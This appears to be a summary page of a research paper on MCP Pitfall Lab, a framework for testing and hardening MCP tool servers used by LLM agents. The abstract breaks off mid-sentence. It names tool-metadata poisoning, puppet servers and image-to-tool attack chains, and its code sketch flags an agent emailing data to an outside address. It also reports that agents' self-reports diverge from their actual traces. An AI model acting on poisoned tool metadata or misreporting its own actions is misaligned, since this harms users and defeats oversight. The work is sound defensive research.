MCP Pitfall Lab: Exposing Developer Pitfalls in MCP Tool Server Security under Multi-Vector Attacks
Run Hao, Zhuoran Tan

TL;DR
MCP Pitfall Lab is a security testing framework that identifies and mitigates developer pitfalls in MCP tool servers, enhancing robustness against multi-vector attacks through trace-based validation and hardening.
Contribution
It introduces a protocol-aware, trace-grounded security testing framework for MCP, with automated analysis and practical hardening guidance against complex attack scenarios.
Findings
The static analysis achieves a perfect F1 score on the key pitfalls.
Applying the hardening measures eliminates all identified pitfalls.
Agent narratives diverge from trace evidence, which motivates trace-based auditing over agent self-report.
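To make the last finding concrete, the following is a minimal sketch of what a trace-grounded check could look like. It is not the paper's validator: the `ToolCall` record, the `send_email` tool name, the `to` argument, and the allowlist are all hypothetical names chosen for illustration. The idea is only that the verdict comes from the recorded tool calls, not from what the agent says it did.

```python
from dataclasses import dataclass
from typing import Any


@dataclass
class ToolCall:
    # Hypothetical, simplified record of one tool invocation taken from a trace.
    tool: str
    arguments: dict[str, Any]


def exfiltration_observed(trace: list[ToolCall], allowed: set[str]) -> bool:
    """Return True if any send_email call targets a recipient outside the allowlist."""
    for call in trace:
        if call.tool != "send_email":
            continue
        if call.arguments.get("to", "") not in allowed:
            return True
    return False


def narrative_diverges(agent_claims_safe: bool, trace: list[ToolCall], allowed: set[str]) -> bool:
    """Return True when the agent reports a safe run but the trace shows otherwise."""
    return agent_claims_safe and exfiltration_observed(trace, allowed)


# Illustrative trace: the agent reads the inbox, then mails an unknown address.
trace = [
    ToolCall("read_inbox", {}),
    ToolCall("send_email", {"to": "attacker@example.com", "body": "..."}),
]
allowed = {"alice@example.com"}

print(narrative_diverges(agent_claims_safe=True, trace=trace, allowed=allowed))
```

In this sketch the agent's self-report is reduced to a single boolean; a real audit would need to parse the agent's narrative and a richer trace schema, both of which are outside what the summary specifies.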
Abstract
Model Context Protocol (MCP) is increasingly adopted for tool-integrated LLM agents, but its multi-layer design and third-party server ecosystem expand risks across tool metadata, untrusted outputs, cross-tool flows, multimodal inputs, and supply-chain vectors. Existing MCP benchmarks largely measure robustness to malicious inputs but offer limited remediation guidance. We present MCP Pitfall Lab, a protocol-aware security testing framework that operationalizes developer pitfalls as reproducible scenarios and validates outcomes with MCP traces and objective validators (rather than agent self-report). We instantiate three workflow challenges (email, document, crypto) with six server variants (baseline and hardened) and model three attack families: tool-metadata poisoning, puppet servers, and multimodal image-to-tool chains, in a unified, trace-grounded evaluation. In Tier-1 static…
